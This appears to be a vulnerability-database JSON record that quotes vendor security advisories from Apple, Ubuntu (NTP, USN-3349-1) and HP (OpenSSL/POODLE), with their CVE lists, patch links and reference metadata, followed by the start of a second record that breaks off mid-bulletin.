Kingman\n\nSecurity\nAvailable for: OS X Lion v10.8 and later\nImpact: A revoked certificate may be trusted\nDescription: A certificate validation issue existed in the handling\nof revocation data. This issue was addressed through improved\nvalidation. \nCVE-2017-7080: Sven Driemecker of adesso mobile solutions gmbh, Rune\nDarrud (@theflyingcorpse) of BA|rum kommune, an anonymous researcher,\nan anonymous researcher\n\nSQLite\nAvailable for: OS X Lion v10.8 and later\nImpact: Multiple issues in SQLite\nDescription: Multiple issues were addressed by updating to version\n3.19.3. \nCVE-2017-10989: found by OSS-Fuzz\nCVE-2017-7128: found by OSS-Fuzz\nCVE-2017-7129: found by OSS-Fuzz\nCVE-2017-7130: found by OSS-Fuzz\n\nSQLite\nAvailable for: OS X Lion v10.8 and later\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-7127: an anonymous researcher\n\nWebKit\nAvailable for: OS X Lion v10.8 and later\nImpact: A malicious website may be able to track users in Safari\nprivate browsing mode\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed with improved restrictions. \nCVE-2017-7144: an anonymous researcher\n\nzlib\nAvailable for: OS X Lion v10.8 and later\nImpact: Multiple issues in zlib\nDescription: Multiple issues were addressed by updating to version\n1.2.11. \nCVE-2016-9840\nCVE-2016-9841\nCVE-2016-9842\nCVE-2016-9843\n\nAdditional recognition\n\nSecurity\nWe would like to acknowledge Abhinav Bansal of Zscaler, Inc. \nfor their assistance. \n\nInstallation note:\n\nmacOS 10.13 may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJZyUQfAAoJEIOj74w0bLRGmSEP/0wgqASRSNneoBx/AMLk0Qac\nmZhI8HuyJRTFwCOT7P7vkZTmoxtyOOdh4XaInvKMsW5I2G64YEmW86pcofHwdOTz\nTSWIAdus34xErUZ13rMzfg8Z3XAberG1E31QU2y2EXenpJSZIL8nzLgt8ySPVyzu\nPrQJxGxCMq1WAOSemGe+4rK2rMwpw5UDZyTbNPDi6lfKz0ZmtfvBzrgBq2xhA9iF\n/2NVs5rRog38N6F6xR6GNqi0dVoZmh1umQINh9nzTn8crbSuI3ixRtQYxstxU91/\n0wrgV03YF297n6bwVhawEDPU8obZzFgQRiKOjghE6h4YBVccWxMI9n42PwVc+G/Z\nX48wuSavpOEV6WEC+hWtALl/W73uH3jF2iK8rPBcDENheRlFi/y5+XeOK8TGJftS\n6raj+IgbgERaY3uXcRoi0mLflpzxvGBYlTiJRRj7H7HFZO6v14hYyEMVrWmhFUiZ\nXgy/qxHdWd/NW4AZz8Ke+ZMaJr21DozzI8ejug9shD7O/N31ZNq2qsNmxEweCPvt\nyMauTPAUutApHTEUXfwCdOy+ZGgTtWDnOC+g3ezkAOdigvjFcwlFH0Sbjxnhxbbp\nLVLz7tHwyKa5Xcwet0ZRH3WCHBsTzzkpsgxoyEMabE2KGS461uZw20t2uZozNsV0\nbniy26PJZ5xGrFOSZYUa\n=wBKW\n-----END PGP SIGNATURE-----\n\n\n\n. ==========================================================================\nUbuntu Security Notice USN-3349-1\nJuly 05, 2017\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 17.04\n- Ubuntu 16.10\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. \n\nSoftware Description:\n- ntp: Network Time Protocol daemon and utility programs\n\nDetails:\n\nYihan Lian discovered that NTP incorrectly handled certain large request\ndata values. A remote attacker could possibly use this issue to cause NTP\nto crash, resulting in a denial of service. This issue only affected\nUbuntu 16.04 LTS. (CVE-2016-2519)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed\naddresses when performing rate limiting. A remote attacker could possibly\nuse this issue to perform a denial of service. This issue only affected\nUbuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted\nbroadcast mode packets. A remote attacker could possibly use this issue to\nperform a denial of service. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to perform a denial of\nservice. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and\nUbuntu 16.10. (CVE-2016-7429)\n\nSharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly\nhandled origin timestamps of zero. A remote attacker could possibly use\nthis issue to bypass the origin timestamp protection mechanism. This issue\nonly affected Ubuntu 16.10. (CVE-2016-7431)\n\nBrian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP\nincorrectly performed initial sync calculations. This issue only applied\nto Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7433)\n\nMagnus Stubman discovered that NTP incorrectly handled certain mrulist\nqueries. A remote attacker could possibly use this issue to cause NTP to\ncrash, resulting in a denial of service. This issue only affected Ubuntu\n16.04 LTS and Ubuntu 16.10. (CVE-2016-7434)\n\nMatthew Van Gund discovered that NTP incorrectly handled origin timestamp\nchecks. A remote attacker could possibly use this issue to perform a denial\nof service. This issue only affected Ubuntu Ubuntu 16.10, and Ubuntu 17.04. \n(CVE-2016-9042)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control\nmode packets. A remote attacker could use this issue to set or unset traps. \nThis issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu\n16.10. (CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. \nA remote attacker could possibly use this issue to cause NTP to crash,\nresulting in a denial of service. This issue only applied to Ubuntu 14.04\nLTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9311)\n\nIt was discovered that NTP incorrectly handled memory when processing long\nvariables. A remote authenticated user could possibly use this issue to\ncause NTP to crash, resulting in a denial of service. (CVE-2017-6458)\n\nIt was discovered that NTP incorrectly handled memory when processing long\nvariables. A remote authenticated user could possibly use this issue to\ncause NTP to crash, resulting in a denial of service. This issue only\napplied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. (CVE-2017-6460)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly\nhandled the /dev/datum device. A local attacker could possibly use this\nissue to cause a denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings\nin a :config directive. A remote authenticated user could possibly use\nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6463)\n\nIt was discovered that NTP incorrectly handled certain invalid mode\nconfiguration directives. A remote authenticated user could possibly use\nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6464)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 17.04:\n ntp 1:4.2.8p9+dfsg-2ubuntu1.1\n\nUbuntu 16.10:\n ntp 1:4.2.8p8+dfsg-1ubuntu2.1\n\nUbuntu 16.04 LTS:\n ntp 1:4.2.8p4+dfsg-3ubuntu5.5\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.11\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n https://www.ubuntu.com/usn/usn-3349-1\n CVE-2016-2519, CVE-2016-7426, CVE-2016-7427, CVE-2016-7428,\n CVE-2016-7429, CVE-2016-7431, CVE-2016-7433, CVE-2016-7434,\n CVE-2016-9042, CVE-2016-9310, CVE-2016-9311, CVE-2017-6458,\n CVE-2017-6460, CVE-2017-6462, CVE-2017-6463, CVE-2017-6464\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p9+dfsg-2ubuntu1.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p8+dfsg-1ubuntu2.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.5\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.11\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2017-6458" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "BID", "id": "97051" }, { "db": "VULHUB", "id": "VHN-114661" }, { "db": "VULMON", "id": "CVE-2017-6458" }, { "db": "PACKETSTORM", "id": "142284" }, { "db": "PACKETSTORM", "id": "144366" }, { "db": "PACKETSTORM", "id": "143259" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-6458", "trust": 3.2 }, { "db": "BID", "id": "97051", "trust": 2.1 }, { "db": "SECTRACK", "id": "1038123", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-211752", "trust": 1.8 }, { "db": "ICS CERT", "id": "ICSA-21-159-11", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "142284", "trust": 1.2 }, { "db": "JVN", "id": "JVNVU95781418", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU95549222", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-002167", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201703-105", "trust": 0.7 }, { "db": "CS-HELP", "id": "SB2021041363", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202104-975", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021061008", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-114661", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-6458", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "144366", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143259", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-114661" }, { "db": "VULMON", "id": "CVE-2017-6458" }, { "db": "BID", "id": "97051" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "PACKETSTORM", "id": "142284" }, { "db": "PACKETSTORM", "id": "144366" }, { "db": "PACKETSTORM", "id": "143259" }, { "db": "NVD", "id": "CVE-2017-6458" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "id": "VAR-201703-1146", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-114661" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T11:42:33.233000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "March\u00a02017\u00a0ntp-4.2.8p10\u00a0NTP\u00a0Security\u00a0Vulnerability\u00a0Announcement Security\u00a0Notice", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#march_2017_ntp_4_2_8p10_ntp_secu" }, { "title": "NTP Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=153316" }, { "title": "Amazon Linux AMI: ALAS-2017-816", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2017-816" }, { "title": "Brocade Security Advisories: BSA-2017-294", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=c22fec7facdf174a5842c3aff3523288" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3349-1" }, { "title": "Apple: macOS High Sierra 10.13", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=dc5ef303c64758e2c6d76a32028764e1" }, { "title": "Symantec Security Advisories: SA147 : March 2017 NTP Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=7d6a7035af520037b0eb5fc69b3c488f" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=85311fa037162a48cd67fd63f52a6478" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" } ], "sources": [ { "db": "VULMON", "id": "CVE-2017-6458" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.1 }, { "problemtype": "Buffer error (CWE-119) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-114661" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "NVD", "id": "CVE-2017-6458" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://support.ntp.org/bin/view/main/ntpbug3379" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/97051" }, { "trust": 1.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#march_2017_ntp_4_2_8p10_ntp_secu" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-211752.pdf" }, { "trust": 1.8, "url": "https://support.apple.com/ht208144" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1038123" }, { "trust": 1.7, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-159-11" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbux03962en_us" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3349-1" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/archive/1/540464/100/0/threaded" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa147" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht208144" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k99254031" }, { "trust": 1.1, "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2017-294/" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2017/sep/62" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2017/nov/7" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/142284/slackware-security-advisory-ntp-updates.html" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6458" }, { "trust": 1.0, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4b7bmvxv53ee7xyw2kavetdhtp452o3z/" }, { "trust": 1.0, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7kvlfa3j43qfip4i7he7kq5fxsmjekc6/" }, { "trust": 1.0, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/zuppicjxwl3awqb7i3awuc74yon7uing/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95549222/index.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu95781418/index.html" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021061008" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2017-6458" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory9.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6460" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9042" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6463" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6462" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6464" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6451" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6459" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6455" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6452" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbux03962en_us" }, { "trust": 0.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7kvlfa3j43qfip4i7he7kq5fxsmjekc6/" }, { "trust": 0.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4b7bmvxv53ee7xyw2kavetdhtp452o3z/" }, { "trust": 0.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/zuppicjxwl3awqb7i3awuc74yon7uing/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://alas.aws.amazon.com/alas-2017-816.html" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3349-1/" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6452" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6464" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6451" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6459" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6462" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6458" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-9042" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6463" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6455" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6460" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7114" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-10989" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7080" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7078" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0381" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7077" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9842" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000373" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7083" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7074" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11103" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7082" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9840" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7084" }, { "trust": 0.1, "url": "https://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9063" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9841" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7086" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9843" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7431" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9311" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9310" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p9+dfsg-2ubuntu1.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7428" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7434" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p8+dfsg-1ubuntu2.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7427" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.11" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7426" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7433" } ], "sources": [ { "db": "VULHUB", "id": "VHN-114661" }, { "db": "VULMON", "id": "CVE-2017-6458" }, { "db": "BID", "id": "97051" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "PACKETSTORM", "id": "142284" }, { "db": "PACKETSTORM", "id": "144366" }, { "db": "PACKETSTORM", "id": "143259" }, { "db": "NVD", "id": "CVE-2017-6458" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-114661" }, { "db": "VULMON", "id": "CVE-2017-6458" }, { "db": "BID", "id": "97051" }, { "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "db": "PACKETSTORM", "id": "142284" }, { "db": "PACKETSTORM", "id": "144366" }, { "db": "PACKETSTORM", "id": "143259" }, { "db": "NVD", "id": "CVE-2017-6458" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-03-27T00:00:00", "db": "VULHUB", "id": "VHN-114661" }, { "date": "2017-03-27T00:00:00", "db": "VULMON", "id": "CVE-2017-6458" }, { "date": "2017-03-21T00:00:00", "db": "BID", "id": "97051" }, { "date": "2017-03-31T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "date": "2017-04-24T22:23:00", "db": "PACKETSTORM", "id": "142284" }, { "date": "2017-09-28T00:13:55", "db": "PACKETSTORM", "id": "144366" }, { "date": "2017-07-06T20:21:00", "db": "PACKETSTORM", "id": "143259" }, { "date": "2017-03-27T17:59:00.633000", "db": "NVD", "id": "CVE-2017-6458" }, { "date": "2021-04-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202104-975" }, { "date": "2017-03-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-07-12T00:00:00", "db": "VULHUB", "id": "VHN-114661" }, { "date": "2021-07-12T00:00:00", "db": "VULMON", "id": "CVE-2017-6458" }, { "date": "2017-07-13T19:06:00", "db": "BID", "id": "97051" }, { "date": "2021-06-10T09:10:00", "db": "JVNDB", "id": "JVNDB-2017-002167" }, { "date": "2023-11-07T02:49:55.337000", "db": "NVD", "id": "CVE-2017-6458" }, { "date": "2021-04-14T00:00:00", "db": "CNNVD", "id": "CNNVD-202104-975" }, { "date": "2021-06-11T00:00:00", "db": "CNNVD", "id": "CNNVD-201703-105" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "143259" }, { "db": "CNNVD", "id": "CNNVD-201703-105" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP\u00a0 of \u00a0ctl_put*\u00a0 Buffer overflow vulnerability in function", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-002167" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-202104-975" } ], "trust": 0.6 } }
var-201408-0212
Vulnerability from variot
The ssl_set_client_disabled function in t1_lib.c in OpenSSL 1.0.1 before 1.0.1i allows remote SSL servers to cause a denial of service (NULL pointer dereference and client application crash) via a ServerHello message that includes an SRP ciphersuite without the required negotiation of that ciphersuite with the client. OpenSSL is prone to a local denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. OpenSSL 1.0.1 prior to 1.0.1i are vulnerable.
References:
CVE-2014-3566 CVE-2014-5139 SSRT101916
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Contact vcemsdksupportteam@hp.com to request the HP Virtual Connect Enterprise Manager SDK v7.4.1 or later. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04624296
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04624296 Version: 1
HPSBMU03304 rev.1 - HP Insight Control server deployment on Linux and Windows, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-04-01 Last Updated: 2015-04-01
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH), HP Smart Update Manager (SUM), and HP Version Control Agent (VCA) which are components of HP Insight Control server deployment. These vulnerabilities are related to the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE". The components of HP Insight Control server deployment could be exploited remotely to allow disclosure of information.
HP Insight Control server deployment includes HP System Management Homepage (SMH), HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and deploys them through the following jobs. This bulletin provides the information needed to update the vulnerable components in HP Insight Control server deployment.
Install HP Management Agents for Windows x86/x64 Install HP Management Agents for RHEL 5 x64 Install HP Management Agents for RHEL 6 x64 Install HP Management Agents for SLES 10 x64 Install HP Management Agents for SLES 11 x64 Upgrade Proliant Firmware
References:
CVE-2014-3508 CVE-2014-3509 CVE-2014-3511 CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-3568 CVE-2014-5139 SSRT102004
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1
BACKGROUND
CVSS 2.0 Base Metrics
